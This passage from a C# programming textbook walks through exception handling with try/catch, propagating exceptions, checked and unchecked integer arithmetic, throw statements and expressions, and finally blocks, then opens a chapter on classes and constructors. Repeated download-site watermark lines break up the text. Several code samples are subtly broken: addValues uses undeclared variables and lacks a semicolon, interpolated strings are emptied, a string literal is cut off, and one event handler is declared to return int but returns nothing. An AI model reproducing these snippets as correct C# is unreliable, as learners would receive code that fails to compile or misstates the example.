demonstrate the lack of robustness in the current version of the program.
4. In the Left Operand box, type John, and in the Right Operand box, type
2. Click the + Addition button, and then click Calculate.
This input triggers Windows default exception handling: the application
simply terminates, and you are returned to the desktop!
Now that you have seen how the application behaves when an unhandled
exception occurs, the next step is to make the application more robust by
handling invalid input and preventing unhandled exceptions from arising.
Write a try/catch statement block
1. Return to Visual Studio 2017.
2. On the Debug menu, click Start Debugging.
3. When the form appears, in the Left Operand box, type John, and in the
Right Operand box, type 2. Click the + Addition button, and then click
Calculate.
This input should cause the same exception that occurred in the previous
exercise, except that now you are running in debug mode, so Visual
Studio traps the exception and reports it.
Visual Studio displays your code and highlights the statement that
caused the exception. It also displays a dialog box that describes the
exception, which in this case is “Input string was not in a correct
format.”
You can see that a FormatException was thrown by the call to int.Parse
inside the addValues method. The problem is that this method is unable
to parse the text “John” into a valid number.
Download from finelybook [email protected]
237
4. In the exception dialog box, click View Details.
The QuickWatch dialog box opens in which you can view more details
about the exception. If you expand the exception, you can see this
information:
Download from finelybook [email protected]
238
Tip Some exceptions are the result of other exceptions raised
earlier. The exception reported by Visual Studio is just the final
exception in this chain, but it is usually the earlier exceptions that
highlight the real cause of the problem. You can drill into these
earlier exceptions by expanding the InnerException property in the
View Detail dialog box. Inner exceptions might have further inner
exceptions, and you can keep digging down until you find an
exception with the InnerException property set to null (as shown in
the previous image). At this point, you have reached the initial
exception, and this exception typically highlights the problem that
you need to address.
Download from finelybook [email protected]
239
5. Click Close in the QuickWatch dialog box, and then, in Visual Studio,
on the Debug menu, click Stop Debugging.
6. Display the code for the file MainPage.xaml.cs in the Code and Text
Editor window, and locate the addValues method.
7. Add a try block (including braces) around the statements inside this
method, together with a catch handler for the FormatException
exception, as shown in bold here:
Click here to view code image
try
{
int lhs = int.Parse(lhsOperand.Text);
int rhs = int.Parse(rhsOperand.Text);
int outcome = 0;
outcome = lhs + rhs;
expression.Text = $" + ";
result.Text = outcome.ToString();
}
catch (FormatException fEx)
{
result.Text = fEx.Message;
}
Now, if a FormatException exception occurs, the catch handler displays
the text held in the exception’s Message property in the result text box at
the bottom of the form.
8. On the Debug menu, click Start Debugging.
9. When the form appears, in the Left Operand box, type John, and in the
Right Operand box type 2. Click the + Addition button, and then click
Calculate.
The catch handler successfully catches the FormatException, and the
message “Input string was not in a correct format” is written to the
Result text box. The application is now a bit more robust.
Download from finelybook [email protected]
240
10. Replace John with the number 10. In the Right Operand box, type
Sharp, and then click Calculate.
The try block surrounds the statements that parse both text boxes, so the
same exception handler handles user input errors in both text boxes.
11. In the Right Operand box, replace Sharp with 20, click the + Addition
button, and then click Calculate.
The application now works as expected and displays the value 30 in the
Result box.
12. In the Left Operand box, replace 10 with John, click the – Subtraction
button, and then click Calculate.
Visual Studio drops into the debugger and reports a FormatException
exception again. This time, the error has occurred in the subtractValues
method, which does not include the necessary try/catch processing. You
will fix this problem shortly.
13. On the Debug menu, click Stop Debugging.
Download from finelybook [email protected]
241
Propagating exceptions
Adding a try/catch block to the addValues method has made that method
more robust, but you need to apply the same exception handling to the other
methods: subtractValues, multiplyValues, divideValues, and
remainderValues. The code for each of these exception handlers will likely
be very similar, resulting in you writing the same code in each method. Each
of these methods is called by the calculateClick method when the user clicks
the Calculate button. Therefore, to avoid duplication of the exception-
handling code, it makes sense to relocate it to the calculateClick method. If a
FormatException occurs in the subtractValues, multiplyValues, divideValues,
or remainderValues method, it will be propagated back to the calculateClick
method for handling as described in the section “Unhandled exceptions”
earlier in this chapter.
Propagate an exception back to the calling method
1. Display the code for the file MainPage.xaml.cs in the Code and Text
Editor window, and locate the addValues method.
2. Remove the try block and catch handler from the addValues method and
return it to its original state, as shown in the following code:
Click here to view code image
private void addValues()
{
int leftHandSide = int.Parse(lhsOperand.Text);
int rightHandSide = int.Parse(rhsOperand.Text);
int outcome = 0;
outcome = lhs + rhs;
expression.Text = lhsOperand.Text + " + " + rhsOperand.Text
result.Text = outcome.ToString();
}
3. Find the calculateClick method. Add to this method the try block and
catch handler shown in bold in the following example:
Click here to view code image
private void calculateClick(object sender, RoutedEventArgs e)
{
try
{
Download from finelybook [email protected]
242
if ((bool)addition.IsChecked)
{
addValues();
}
else if ((bool)subtraction.IsChecked)
{
subtractValues();
}
else if ((bool)multiplication.IsChecked)
{
multiplyValues();
}
else if ((bool)division.IsChecked)
{
divideValues();
}
else if ((bool)remainder.IsChecked)
{
remainderValues();
}
}
catch (FormatException fEx)
{
result.Text = fEx.Message;
}
}
4. On the Debug menu, click Start Debugging.
5. When the form appears, in the Left Operand box, type John, and in the
Right Operand box, type 2. Click the + Addition button, and then click
Calculate.
As before, the catch handler successfully catches the FormatException,
and the message “Input string was not in a correct format” is written to
the Result text box. However, bear in mind that the exception was
actually thrown in the addValues method, but the handler caught it in the
calculateClick method.
6. Click the – Subtraction button, and then click Calculate.
This time, the subtractValues method causes the exception, but it is
propagated back to the calculateClick method and handled in the same
manner as before.
7. Test the * Multiplication, / Division, and % Remainder buttons, and
verify that the FormatException exception is caught and handled
Download from finelybook [email protected]
243
correctly.
8. Return to Visual Studio and stop debugging.
Note The decision whether to catch unhandled exceptions explicitly in a
method depends on the nature of the application you are building. In
some cases, it makes sense to catch exceptions as close as possible to
the point at which they occur. In other situations, it is more useful to let
an exception propagate back to the method that invoked the routine that
threw the exception and handle the error there.
Using checked and unchecked integer arithmetic
Chapter 2 discusses how to use binary arithmetic operators such as + and *
on primitive data types such as int and double. You should also recall that the
primitive data types have a fixed size. For example, a C# int is 32 bits.
Because int has a fixed size, you know exactly the range of values that it can
hold: it is –2147483648 to 2147483647.
Tip If you want to refer to the minimum or maximum value of int in
code, you can use the int.MinValue or int.MaxValue properties.
The fixed size of the int type creates a problem. For example, what
happens if you add 1 to an int whose value is currently 2147483647? The
answer is that it depends on how the application is compiled. By default, the
C# compiler generates code that allows the calculation to overflow silently
and you get the wrong answer. (In fact, the calculation wraps around to the
largest negative integer value, and the result generated is –2147483648.) The
Download from finelybook [email protected]
244
reason for this behavior is performance: integer arithmetic is a common
operation in almost every program, and adding the overhead of overflow
checking to each integer expression could lead to very poor performance. In
many cases, the risk is acceptable because you know (or hope!) that your int
values won’t reach their limits. If you don’t like this approach, you can turn
on overflow checking.
Tip You can turn overflow checking on and off in Visual Studio 2017
by setting the project properties. In Solution Explorer, click YourProject
(where YourProject is the actual name of the project). On the Project
menu, click YourProject Properties. In the project properties dialog box,
click the Build tab. Click the Advanced button in the lower-right corner
of the page. In the Advanced Build Settings dialog box, select or clear
the Check For Arithmetic Overflow/Underflow check box.
Regardless of how you compile an application, you can use the checked
and unchecked keywords to turn on and off integer arithmetic overflow
checking in parts of an application that you think need it. These keywords
override the compiler option specified for the project.
Writing checked statements
A checked statement is a block preceded by the checked keyword. All integer
arithmetic in a checked statement always throws an OverflowException if an
integer calculation in the block overflows, as shown in this example:
Click here to view code image
int number = int.MaxValue;
checked
{
int willThrow = number++;
Console.WriteLine("this
}
Download from finelybook [email protected]
245
Important Only integer arithmetic directly inside the checked block is
subject to overflow checking. For example, if one of the checked
statements is a method call, checking does not apply to code that runs in
the method that is called.
You can also use the unchecked keyword to create an unchecked block
statement. All integer arithmetic in an unchecked block is not checked and
never throws an OverflowException. For example:
Click here to view code image
int number = int.MaxValue;
unchecked
{
int wontThrow = number++;
Console.WriteLine("this will be reached");
}
Writing checked expressions
You can also use the checked and unchecked keywords to control overflow
checking on integer expressions by preceding just the individual
parenthesized expression with the checked or unchecked keyword, as shown
in these examples:
Click here to view code image
int wontThrow = unchecked(int.MaxValue + 1);
int willThrow = checked(int.MaxValue + 1);
The compound operators (such as += and –=) and the increment (++) and
decrement (--) operators are arithmetic operators and can be controlled by
using the checked and unchecked keywords. Remember, x += y is the same as
x = x + y.
Download from finelybook [email protected]
246
Important You cannot use the checked and unchecked keywords to
control floating-point (noninteger) arithmetic. The checked and
unchecked keywords apply only to integer arithmetic using data types
such as int and long. Floating-point arithmetic never throws
OverflowException—not even when you divide by 0.0. (Remember
from Chapter 2 that the .NET Framework has a special floating-point
representation for infinity.)
In the following exercise, you will see how to perform checked arithmetic
when using Visual Studio 2017.
Use checked expressions
1. Return to Visual Studio 2017.
2. On the Debug menu, click Start Debugging.
You will now attempt to multiply two large values.
3. In the Left Operand box, type 9876543. In the Right Operand box, type
9876543. Click the * Multiplication button, and then click Calculate.
The value –1195595903 appears in the Result box on the form. This is a
negative value, which cannot possibly be correct. This value is the result
of a multiplication operation that silently overflowed the 32-bit limit of
the int type.
4. Return to Visual Studio and stop debugging.
5. In the Code and Text Editor window displaying MainPage.xaml.cs,
locate the multiplyValues method, which should look like this:
Click here to view code image
private void multiplyValues()
{
int lhs = int.Parse(lhsOperand.Text);
int rhs = int.Parse(rhsOperand.Text);
int outcome = 0;
outcome = lhs * rhs;
expression.Text = $" * ";
result.Text = outcome.ToString();
Download from finelybook [email protected]
247
}
The statement outcome = lhs * rhs; contains the multiplication operation
that is silently overflowing.
6. Edit this statement so that the calculation value is checked, like this:
outcome = checked(lhs * rhs);
The multiplication is now checked and will throw an OverflowException
rather than silently returning the wrong answer.
7. On the Debug menu, click Start Debugging.
8. In the Left Operand box, type 9876543. In the Right Operand box, type
9876543. Click the * Multiplication button, and then click Calculate.
This time, Visual Studio drops into the debugger and reports that the
multiplication resulted in an OverflowException exception. You now
need to add a handler to catch this exception and handle it more
gracefully than just failing with an error.
9. On the Debug menu, click Stop Debugging.
10. In the Code and Text Editor window displaying the MainPage.xaml.cs
file, locate the calculateClick method.
11. Add the following catch handler (shown in bold) immediately after the
existing FormatException catch handler in this method:
Click here to view code image
private void calculateClick(object sender, RoutedEventArgs e)
{
try
{
...
}
catch (FormatException fEx)
{
result.Text = fEx.Message;
}
catch (OverflowException oEx)
{
result.Text = oEx.Message;
}
}
Download from finelybook [email protected]
248
The logic of this catch handler is the same as that for the
FormatException catch handler. However, it is still worth keeping these
handlers separate instead of simply writing a generic Exception catch
handler; in the future you might decide to handle these exceptions
differently.
12. On the Debug menu, click Start Debugging to build and run the
application.
13. In the Left Operand box, type 9876543. In the Right Operand box, type
9876543. Click the * Multiplication button, and then click Calculate.
The second catch handler successfully catches the OverflowException
and displays the message “Arithmetic operation resulted in an overflow”
in the Result box.
14. Return to Visual Studio and stop debugging.
Exception handling and the Visual Studio debugger
By default, the Visual Studio debugger only stops an application that is
being debugged and reports exceptions that are unhandled. Sometimes it
is useful to be able to debug exception handlers themselves, and in this
case you need to be able to trace exceptions when they are thrown by
the application, before they are caught. You can easily do this. On the
Debug menu, click Windows and then click Exception Settings. The
Exception Settings pane appears below the Code and Text Editor
window:
Download from finelybook [email protected]
249
In the Exception Settings pane, expand Common Language Runtime
Exceptions, scroll down, and select System.OverflowException:
Now, when exceptions such as OverflowException occur, Visual
Studio will drop into the debugger, and you can use the Step Into button
on the Debug toolbar to step into the catch handler.
Throwing exceptions
Download from finelybook [email protected]
250
Suppose that you are implementing a method called monthName that accepts
a single int argument and returns the name of the corresponding month. For
example, monthName(1) returns “January,” monthName(2) returns
“February,” and so on. The question is, what should the method return if the
integer argument is less than 1 or greater than 12? The best answer is that the
method shouldn’t return anything at all—it should throw an exception. The
.NET Framework class libraries contain lots of exception classes specifically
designed for situations such as this. Most of the time, you will find that one
of these classes describes your exceptional condition. (If not, you can easily
create your own exception class, but you need to know a bit more about the
C# language before you can do that.) In this case, the existing .NET
Framework ArgumentOutOfRangeException class is just right. You can
throw an exception by using a throw statement, as shown in the following
example:
Click here to view code image
public static string monthName(int month)
{
switch (month)
{
case 1 :
return "January";
case 2 :
return "February";
...
case 12 :
return "December";
default :
throw new ArgumentOutOfRangeException("Bad month");
}
}
The throw statement needs an exception object to throw. This object
contains the details of the exception, including any error messages. This
example uses an expression that creates a new
ArgumentOutOfRangeException object. The object is initialized with a string
that populates its Message property by using a constructor. Constructors are
covered in detail in Chapter 7, “Creating and managing classes and objects.”
In the following exercises, you will modify the MathsOperators project to
throw an exception if the user attempts to perform a calculation without
selecting a radio button for an operator.
Download from finelybook [email protected]
251
Note This exercise is a little contrived, as any good application design
would have a default radio button selected initially, but this application
is intended to illustrate a point.
Throw an exception
1. Return to Visual Studio 2017.
2. On the Debug menu, click Start Debugging.
3. In the Left Operand box, type 24. In the Right Operand box, type 36,
and then click Calculate.
Nothing appears in the Expression and Result boxes. The fact that you
have not selected an operator option is not immediately obvious. It
would be useful to write a diagnostic message in the Result box.
4. Return to Visual Studio and stop debugging.
5. In the Code and Text Editor window displaying MainPage.xaml.cs,
locate and examine the calculateClick method, which should currently
look like this:
Click here to view code image
private int calculateClick(object sender, RoutedEventArgs e)
{
try
{
if ((bool)addition.IsChecked)
{
addValues();
}
else if ((bool)subtraction.IsChecked)
{
subtractValues();
}
else if ((bool)multiplication.IsChecked)
{
multiplyValues();
}
Download from finelybook [email protected]
252
else if ((bool)division.IsChecked)
{
divideValues();
}
else if ((bool)remainder.IsChecked)
{
remainderValues();
}
}
catch (FormatException fEx)
{
result.Text = fEx.Message;
}
catch (OverflowException oEx)
{
result.Text = oEx.Message;
}
}
The addition, subtraction, multiplication, division, and remainder fields
are the buttons that appear on the form. Each button has a property
called IsChecked that indicates whether the user has selected it. The
IsChecked property is a nullable Boolean that has the value true if the
button is selected or false otherwise. (You learn more about nullable
values in Chapter 8, “Understanding values and references.”) The
cascading if statement examines each button, in turn, to find which one
is selected. (The radio buttons are mutually exclusive , so that the user
can select only one radio button at most.) If none of the buttons is
selected, none of the if statements will be true and none of the
calculation methods are called.
You could try to solve the problem by adding one more else statements
to the if-else cascade to write a message to the result text box on the
form, but a better solution is to separate the detection and signaling of an
error from the catching and handling of that error.
6. Add another else statement to the end of the list of if-else statements and
throw an InvalidOperationException, as shown in bold in the following
code:
Click here to view code image
if ((bool)addition.IsChecked)
{
addValues();
Download from finelybook [email protected]
253
}
...
else if ((bool)remainder.IsChecked)
{
remainderValues();
}
else
{
throw new InvalidOperationException("No operator selected");
}
7. On the Debug menu, click Start Debugging to build and run the
application.
8. In the Left Operand box, type 24. In the Right Operand box, type 36,
and then click Calculate.
Visual Studio detects that your application has thrown an
InvalidOperationException, and an exception dialog box opens. Your
application has thrown an exception, but the code does not catch it yet.
9. On the Debug menu, click Stop Debugging.
Now that you have written a throw statement and verified that it throws an
exception, you will write a catch handler to handle this exception.
Catch the exception
1. In the Code and Text Editor window displaying MainPage.xaml.cs, add
the following catch handler shown in bold immediately below the two
existing catch handlers in the calculateClick method:
Click here to view code image
...
catch (FormatException fEx)
{
result.Text = fEx.Message;
}
catch (OverflowException oEx)
{
result.Text = oEx.Message;
}
catch (InvalidOperationException ioEx)
{
result.Text = ioEx.Message;
}
Download from finelybook [email protected]
254
This code catches the InvalidOperationException that is thrown when
the user fails to select an operator radio button.
2. On the Debug menu, click Start Debugging.
3. In the Left Operand box, type 24. In the Right Operand box, type 36,
and then click Calculate.
The message “No operator selected” appears in the Result box.
Note If your application drops into the Visual Studio debugger,
you have probably enabled Visual Studio to catch all common
language runtime exceptions as they are thrown. If this happens, on
the Debug menu, click Continue. Remember to disable Visual
Studio from catching CLR exceptions as they are thrown when you
have finished this exercise!
4. Return to Visual Studio and stop debugging.
The application is now a lot more robust. However, several exceptions
could still arise that are not caught and will cause the application to fail. For
example, if you attempt to divide by 0, an unhandled DivideByZeroException
will be thrown. (Integer division by 0 does throw an exception, unlike
floating-point division by 0.) One way to solve this problem is to write an
ever-larger number of catch handlers inside the calculateClick method.
Another solution is to add a general catch handler that catches Exception at
the end of the list of catch handlers. This will trap all unexpected exceptions
that you might have forgotten about, or that might be caused as a result of
truly unusual circumstances.
Note Using a catchall handler to trap the Exception exception is not an
excuse to omit catching specific exceptions. The more definite you can
Download from finelybook [email protected]
255
be in your exception handling, the easier it will be to maintain your
code and spot the causes of any underlying or commonly recurring
issues. Only use the Exception exception for cases that are really…
well, exceptional. For the following exercise, the “divide by zero”
exception falls into this category. However, having established that this
exception is a distinct possibility in a professional application, good
practice would be to add a handler for the DivideByZeroException
exception to the application.
Catch unhandled exceptions
1. In the Code and Text Editor window displaying MainPage.xaml.cs, add
the following catch handler to the end of the list of existing catch
handlers in the calculateClick method:
Click here to view code image
catch (Exception ex)
{
result.Text = ex.Message;
}
This catch handler will catch all hitherto unhandled exceptions,
whatever their specific type.
2. On the Debug menu, click Start Debugging.
You will now attempt to perform some calculations known to cause
exceptions and confirm that they are all handled correctly.
3. In the Left Operand box, type 24. In the Right Operand box, type 36,
and then click Calculate.
Confirm that the diagnostic message “No operator selected” still appears
in the Result box. This message was generated by the
InvalidOperationException handler.
4. In the Left Operand box, type John, click the + Addition button and
then click Calculate.
Confirm that the diagnostic message “Input string was not in a correct
Download from finelybook [email protected]
256
format” appears in the Result box. This message was generated by the
FormatException handler.
5. In the Left Operand box, type 24. In the Right Operand box, type 0.
Click the / Division button, and then click Calculate.
Confirm that the diagnostic message “Attempted to divide by zero”
appears in the Result box. This message was generated by the general
Exception handler.
6. Experiment with other combinations of values, and verify that exception
conditions are handled without causing the application to stop.
7. When you have finished, return to Visual Studio and stop debugging.
Using throw exceptions
A throw exception is semantically similar to a throw statement, except that it
can be used anywhere you can use an expression. For example, suppose you
want to set the string variable name to the value entered into the nameField
text box on a form, but only if the user has actually entered a value into that
field; otherwise, you want to throw a “Missing input” exception. You could
use the following code:
Click here to view code image
string name;
if (nameField.Text != "")
{
name = nameField.Text;
}
else
{
throw new Exception("Missing input"); // this is a throw
statement
}
Although this code does the job, it is a little ungainly and verbose. You
can simplify this block by using a throw expression together with another
operator called the “query-colon” or ?:. The query-colon operator acts like an
inline if…else statement for an expression. It is a ternary operator that takes
the following three operands: a Boolean expression, an expression to evaluate
Download from finelybook [email protected]
257
and return if the Boolean expression is true, and another expression to
evaluate and return if the Boolean expression is false. You can use it with a
throw expression like this:
Click here to view code image
string name = nameField.Text != "" ? nameField.Text : throw new
Exception("Missing input"); // this is a throw expression
In this case, if the nameField text box is not empty the value of the Text
property is stored in the name variable. Otherwise the throw expression is
evaluated, which in turn, throws an exception. This code is much more
concise than the previous example.
Using a finally block
It is important to remember that when an exception is thrown, it changes the
flow of execution through the program. This means that you can’t guarantee
that a statement will always run when the previous statement finishes because
the previous statement might throw an exception. Remember that in this case,
after the catch handler has run, the flow of control resumes at the next
statement in the block holding this handler and not at the statement
immediately following the code that raised the exception.
Look at the example that follows, which is adapted from the code in
Chapter 5, “Using compound assignment and iteration statements.” It’s very
easy to assume that the call to reader.Dispose will always occur when the
while loop completes. After all, it’s right there in the code.
Click here to view code image
TextReader reader = ...;
...
string line = reader.ReadLine();
while (line != null)
{
...
line = reader.ReadLine();
}
reader.Dispose();
Sometimes, it’s not an issue if one particular statement does not run, but
on many occasions, it can be a big problem. If the statement releases a
Download from finelybook [email protected]
258
resource that was acquired in a previous statement, failing to execute this
statement results in the resource being retained. This example is just such a
case: when you open a file for reading, this operation acquires a resource (a
file handle), and you must ensure that you call reader.Dispose to release the
resource. If you don’t, sooner or later you’ll run out of file handles and be
unable to open more files. If you find that file handles are too trivial, think of
database connections instead.
The way to ensure that a statement is always run, whether or not an
exception has been thrown, is to write that statement inside a finally block. A
finally block occurs immediately after a try block or immediately after the
last catch handler after a try block. As long as the program enters the try
block associated with a finally block, the finally block will always be run,
even if an exception occurs. If an exception is thrown and caught locally, the
exception handler executes first, followed by the finally block. If the
exception is not caught locally (that is, the runtime has to search through the
list of calling methods to find a handler), the finally block runs first. The
important point is that the finally block always executes.
The solution to the reader.Dispose problem is as follows:
Click here to view code image
TextReader reader = ...;
...
try
{
string line = reader.ReadLine();
while (line != null)
{
...
line = reader.ReadLine();
}
}
finally
{
if (reader != null)
{
reader.Dispose();
}
}
Even if an exception occurs while reading the file, the finally block
ensures that the reader.Dispose statement always executes. You’ll see
another way to handle this situation in Chapter 14, “Using garbage collection
Download from finelybook [email protected]
259
and resource management.”
Summary
In this chapter, you learned how to catch and handle exceptions by using the
try and catch constructs. You saw how to turn on and off integer overflow
checking by using the checked and unchecked keywords. You learned how to
throw an exception if your code detects an exceptional situation, and you saw
how to use a finally block to ensure that critical code always runs, even if an
exception occurs.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 7.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Catch a specific exception
Write a catch handler that catches the
specific exception class. For example:
Click here to view code image
try
{
...
}
catch (FormatException fEx)
{
...
}
Ensure that integer arithmetic is
always checked for overflow
Use the checked keyword. For
example:
Click here to view code image
int number = Int32.MaxValue;
checked { number++; }
Download from finelybook [email protected]
260
Throw an exception
Use a throw statement. For example:
throw new
FormatException(source);
Catch all exceptions in a single
catch handler
Write a catch handler that catches
Exception. For example:
Click here to view code image
try
{
...
}
catch (Exception ex)
{
...
}
Ensure that some code will always
run, even if an exception is thrown
Write the code within a finally block.
For example:
Click here to view code image
try
{
...
}
finally
{
// always run
}
Download from finelybook [email protected]
261
PART II
Understanding the C# object model
In Part I, you learned how to declare variables, use operators to create values,
call methods, and write many of the statements you need when you
implement a method. You now know enough to progress to the next stage:
combining methods and data into your own functional data structures. The
chapters in Part II show you how to do this.
In Part II, you’ll learn about classes and structures, the two fundamental
types that you use to model the entities and other items that constitute a
typical C# application. In particular, you’ll see how C# creates objects and
value types based on the definitions of classes and structures, and how the
common language runtime (CLR) manages the life cycle of these items. You
will find out how to create families of classes by using inheritance, and you
will learn how to aggregate items by using arrays.
Download from finelybook [email protected]
262
CHAPTER 7
Creating and managing classes and
objects
After completing this chapter, you will be able to:
Define a class containing a related set of methods and data items.
Control the accessibility of members by using the public and private
keywords.
Create objects by using the new keyword to invoke a constructor.
Write and call your own constructors.
Create methods and data that can be shared by all instances of the same
class by using the static keyword.
Explain how to create anonymous classes.
The Windows Runtime together with the Microsoft .NET Framework
contains thousands of classes. You have used a number of them already,
including Console and Exception. Classes provide a convenient mechanism
for modeling the entities manipulated by applications. An entity can represent
a specific item, such as a customer, or something more abstract, such as a
transaction. Part of the design process for any system focuses on determining
the entities that are important to the processes that the system implements and
then performing an analysis to see what information these entities need to
hold and what operations they should perform. You store the information that
a class holds as fields and use methods to implement the operations that a
class can perform.
Download from finelybook [email protected]
263
Understanding classification
Class is the root word of the term classification. When you design a class,
you systematically arrange information and behavior into a meaningful
entity. This arranging is an act of classification and is something that
everyone does, not just programmers. For example, all cars share common
behaviors (they can be steered, stopped, accelerated, and so on) and common
attributes (they have a steering wheel, an engine, and so on). People use the
word car to mean an object that shares these common behaviors and
attributes. As long as everyone agrees on what a word means, this system
works well, and you can express complex but precise ideas in a concise form.
Without classification, it’s hard to imagine how people could think or
communicate at all.
Given that classification is so deeply ingrained in the way we think and
communicate, it makes sense to try to write programs by classifying the
different concepts inherent in a problem and its solution and then modeling
these classes in a programming language. This is exactly what you can do
with object-oriented programming languages, including Microsoft Visual C#.
The purpose of encapsulation
Encapsulation is an important principle when defining classes. The idea is
that a program that uses a class should not have to account for how that class
actually works internally; the program simply creates an instance of a class
and calls the methods of that class. As long as those methods do what they
are designed to do, the program does not need to know how they are
implemented. For example, when you call the Console.WriteLine method,
you don’t want to be bothered with all the intricate details of how the
Console class physically arranges for data to be written to the screen. A class
might need to maintain all sorts of internal state information to perform its
various methods. This additional state information and activity is hidden from
the program that is using the class. Therefore, encapsulation is sometimes
referred to as information hiding. Encapsulation actually has two purposes:
To combine methods and data within a class; in other words, to support
classification
Download from finelybook [email protected]
264
To control the accessibility of the methods and data; in other words, to
control the use of the class
Defining and using a class
In C#, you use the class keyword to define a new class. The data and methods
of the class occur in the body of the class between a pair of braces. Following
is a C# class called Circle that contains one method (to calculate the circle’s
area) and one piece of data (the circle’s radius):
Click here to view code image
class Circle
{
int radius;
double Area()
{
return Math.PI * radius * radius;
}
}
Note The Math class contains methods for performing mathematical
calculations and fields containing mathematical constants. The Math.PI
field contains the value 3.14159265358979, which is an approximation
of the value of pi.
The body of a class contains ordinary methods (such as Area) and fields
(such as radius). Recall from early on in the book that variables in a class are
called fields. Chapter 2, “Working with variables, operators, and
expressions,“ shows how to declare variables, and Chapter 3, “Writing
methods and applying scope,“ demonstrates how to write methods, so there’s
almost no new syntax here.
You can use the Circle class like you have used the other types you have
already met. You create a variable specifying Circle as its type, and then you
initialize the variable with some valid data. Here is an example:
Download from finelybook [email protected]
265
Click here to view code image
Circle c; // Create a Circle variable
c = new Circle(); // Initialize it
A point worth highlighting in this code is the use of the new keyword.
Previously, when you initialized a variable such as an int or a float, you
simply assigned it a value:
Click here to view code image
int i;
i = 42;
You cannot do the same with variables of class types. One reason for this
is that C# just doesn’t provide the syntax for assigning literal class values to
variables. You cannot write a statement such as this:
Click here to view code image
Circle c;
c = 42;
After all, what is the Circle equivalent of 42? Another reason concerns the
way in which memory for variables of class types is allocated and managed
by the runtime—this is discussed further in Chapter 8, “Understanding values
and references.” For now, just accept that the new keyword creates a new
instance of a class, more commonly called an object.
You can, however, directly assign an instance of a class to another
variable of the same type, like this:
Click here to view code image
Circle c;
c = new Circle();
Circle d;
d = c;
However, this is not as straightforward as it might first appear, for reasons
that are described in Chapter 8.
Important Don’t confuse the terms class and object. A class is the
definition of a type. An object is an instance of that type created when
Download from finelybook [email protected]
266
the program runs. Several different objects can be instances of the same
class.
Controlling accessibility
Surprisingly, the Circle class is currently of no practical use. By default,
when you encapsulate your methods and data within a class, the class forms a
boundary to the outside world. Fields (such as radius) and methods (such as
Area) defined in the class can be used by other methods inside the class but
not by the outside world; they are private to the class. So, although you can
create a Circle object in a program, you cannot access its radius field or call
its Area method, which is why the class is not of much use—yet! However,
you can modify the definition of a field or method with the public and private
keywords to control whether it is accessible from the outside:
A method or field is private if it is accessible only from within the
class. To declare that a method or field is private, you write the
keyword private before its declaration. As intimated previously, this is
actually the default, but it is good practice to state explicitly that fields
and methods are private to avoid any confusion.
A method or field is public if it is accessible both within and from
outside the class. To declare that a method or field is public, you write
the keyword public before its declaration.
Here is the Circle class again. This time, Area is declared as a public
method and radius is declared as a private field:
Click here to view code image
class Circle
{
private int radius;
public double Area()
{
return Math.PI * radius * radius;
}
}
Download from finelybook [email protected]
267
Note If you are a C++ programmer, be aware that no colon appears after
the public and private keywords. You must repeat the keyword for
every field and method declaration.
Although radius is declared as a private field and is not accessible from
outside the class, radius is accessible within the Circle class. The Area
method is inside the Circle class, so the body of Area has access to radius.
However, the class is still of limited value because there is no way of
initializing the radius field. To fix this, you can use a constructor.
Tip Remember that variables declared in a method are not initialized by
default. However, the fields in a class are automatically initialized to 0,
false, or null, depending on their type. Nonetheless, it is still good
practice to provide an explicit means of initializing fields.
Naming and accessibility
Many organizations have their own house style that they ask developers
to follow when they write code. Part of this style often involves rules
for naming identifiers. Typically, the purpose of these rules is to make
the code easier to maintain. The following recommendations are
reasonably common and relate to the naming conventions for fields and
methods based on the accessibility of class members; however, C# does
not enforce these rules:
Identifiers that are public should start with a capital letter. For
example, Area starts with A (not a) because it’s public. This
system is known as the PascalCase naming scheme (because it
Download from finelybook [email protected]
268
was first used in the Pascal language).
Identifiers that are not public (which include local variables)
should start with a lowercase letter. For example, radius starts
with r (not R) because it’s private. This system is known as the
camelCase naming scheme.
Note Some organizations use the camelCase scheme only for
methods and adopt the convention to name private fields starting
with an underscore character, such as _radius. However, the
examples in this book use camelCase naming for private methods
and fields.
There’s only one exception to this rule: class names should start with
a capital letter, and constructors must match the name of their class
exactly; therefore, a private constructor must start with a capital letter.
Important Don’t declare two public class members whose names differ
only in case. If you do, developers using other languages that are not
case-sensitive (such as Microsoft Visual Basic) might not be able to
integrate your class into their solutions.
Working with constructors
When you use the new keyword to create an object, the runtime needs to
construct that object by using the definition of the class. The runtime must
grab a piece of memory from the operating system, fill it with the fields
defined by the class, and then invoke a constructor to perform any
Download from finelybook [email protected]
269
initialization required.
A constructor is a special method that runs automatically when you create
an instance of a class. It has the same name as the class, and it can take
parameters, but it cannot return a value (not even void). Every class must
have a constructor. If you don’t write one, the compiler automatically
generates a default constructor for you. (However, the compiler-generated
default constructor doesn’t actually do anything.) You can write your own
default constructor quite easily. Just add a public method that does not return
a value and give it the same name as the class. The following example shows
the Circle class with a default constructor that initializes the radius field to 0:
Click here to view code image
class Circle
{
private int radius;
public Circle() // default constructor
{
radius = 0;
}
public double Area()
{
return Math.PI * radius * radius;
}
}
Note In C# parlance, the default constructor is a constructor that does
not take any parameters. Regardless of whether, the compiler generates
the default construtor or you write it yourself, a constructor that does
not take any parameters is still the default constructor. You can also
write nondefault constructors (constructors that do take parameters), as
you will see in the upcoming section “Overloading constructors.”
In this example, the constructor is marked public. If this keyword is
omitted, the constructor will be private (just like any other method and field).
If the constructor is private, it cannot be used outside the class, which
Download from finelybook [email protected]
270
prevents you from being able to create Circle objects from methods that are
not part of the Circle class. You might, therefore, think that private
constructors are not that valuable. They do have their uses, but they are
beyond the scope of the current discussion.
Having added a public constructor, you can now use the Circle class and
exercise its Area method. Notice how you use dot notation to invoke the Area
method on a Circle object:
Click here to view code image
Circle c;
c = new Circle();
double areaOfCircle = c.Area();
Overloading constructors
You’re almost finished, but not quite. You can now declare a Circle variable,
use it to reference a newly created Circle object, and then call its Area
method. However, there is one last problem. The area of all Circle objects
will always be 0 because the default constructor sets the radius to 0 and it
stays at 0; the radius field is private, and there is no easy way of changing its
value after it has been initialized. A constructor is just a special kind of
method, and it—like all methods—can be overloaded. Just as there are
several versions of the Console.WriteLine method, each of which takes
different parameters, so too can you write different versions of a constructor.
So, you can add another constructor to the Circle class with a parameter that
specifies the radius to use, like this:
Click here to view code image
class Circle
{
private int radius;
public Circle() // default constructor
{
radius = 0;
}
public Circle(int initialRadius) // overloaded constructor
{
radius = initialRadius;
}
Download from finelybook [email protected]
271
public double Area()
{
return Math.PI * radius * radius;
}
}
